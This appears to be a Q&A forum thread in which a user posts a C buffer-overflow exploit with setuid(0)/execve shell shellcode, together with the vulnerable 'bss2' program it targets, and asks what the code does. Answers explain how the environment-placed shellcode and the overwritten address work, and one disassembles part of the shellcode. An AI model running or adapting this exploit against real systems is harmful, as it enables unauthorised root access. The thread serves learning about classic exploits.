# What is this programe doing?

Tags: c, exploit, shellcode, execve

```
#define bufsize 260
/* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */
char shellcode[] ="\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 

int main(void){
    char buf[bufsize] ;
    char *proc[]={"./bss2",buf,NULL};
    char *envir[]={"Bytes=2Lu",shellcode,NULL};
    unsigned long ret_addr = 0xc0000000 - strlen(proc[0]) - strlen(shellcode) - sizeof(void *) - 0x02;
    memset(buf,0x42,sizeof(buf));
    memcpy(buf + bufsize - 4,(char *)&ret_addr,4);
    execve(proc[0],proc,envir);
    return 0;
}
```

what's those `memcpy` and `memset` before `execve` doing?How is it affecting the programe `proc`?

**UPDATE code for bss2**

```
#define LEN 256
void output(char *);
int main(int argc, char **argv) {
    static char buffer[LEN];
    static void (*func) (char *);
    func = output;
    strcpy(buffer, argv[1]);
    func(buffer);
    return EXIT_SUCCESS;
}
void output(char *string) {
    fprintf(stdout, "%s", string);
}
```

**UPDATE**

Seems now the problem boils down to where environment variables are located?

Answer (score 3):

The code is constructing an argument string and an environment (as in, the place where environment variables live).  The argument contains `"./bss2"` in `argv[0]`, and a string of 256 `B` characters followed by a return address in `argv[1]`.  The envir onment contains a dummy variable in the first location, and the shellcode in the second location.

Presumably, the target application `bss2` contains a variable `char x[256];`, which it copies `argv[1]` into without bounds checking.  This causes the function return address to be overwritten by the return address calculated in `ret_addr`, which hopefully points into the environment block.

Comment: so address of environment variables are the same in different processes?

Comment: The address isn't the same, but probably the location of environment relative to other parts of the memory map is the same.

Answer (score 0):

Seems strange to me, because buf argument is not null-terminated.

Well, memset and memcpy do some hack with the first program argument, and then execve launches it. Sorry, cannot say more...

Comment: It looks like the shellcode is placed in an environment variable, and then the stack is mucked with to try to get it to execute.

Comment: @Jason,I just updated with the code `bss2` above,and it's not fetching the shell code from environment variable.

Comment: It's not going to fetch it by accessing the env variable directly, it's trying to bust the stack into the environment variable space, where the code awaits.

Comment: @Jason LeBrun,I don't see such logic in the code above,can you elaborate it?

Answer (score 0):

It is failing to compile because `bufsize` and `shellcode` are undefined.

More seriously it looks like it is trying to exploit a buffer overrun or similar on shell command called `bss2`.

Answer (score 0):

I'm not an expert, but it looks like it's trying to run some exploit.

Indicators include the identifier `shellcode`, manipulating the arguments to another executable with `memset`/`memcpy` and calculating some `ret_addr` value.

Answer (score 0):

It seems like there are some items that are not defined by the code that you posted. Is shellcode defined as a macro or something? The value bufsize is also not known.

The memset call seems to initialize the buffer buf with the octal value 0x42.

The memcpy call appears to be inserting an address at the end of buf.

As mentioned, this buffer (buf) is ultimately being passed as an argument to the bss2 process.

Answer (score 0):

As an exercise for myself, I started disassembling the shellcode by hand. I got as far as:

```
XOR ebx, ebx  #clear ebx
PUSH ebx     #push ebx onto the stack
LEA eax, [ebx+23]  #load 23 into eax
INT 0x80      #do a system call
```

I got bored after that, but system call 23 in linux for the INT 0x80 calls is the sys_setuid, so it looks like it's code to set the UID to 0, or get root. Not surprising, since it's shell code. :-)

Comment: It also says so in the comment, "setuid(0) shellcode by by Matias Sedalo". You can also disassemble it with ndisasm. :)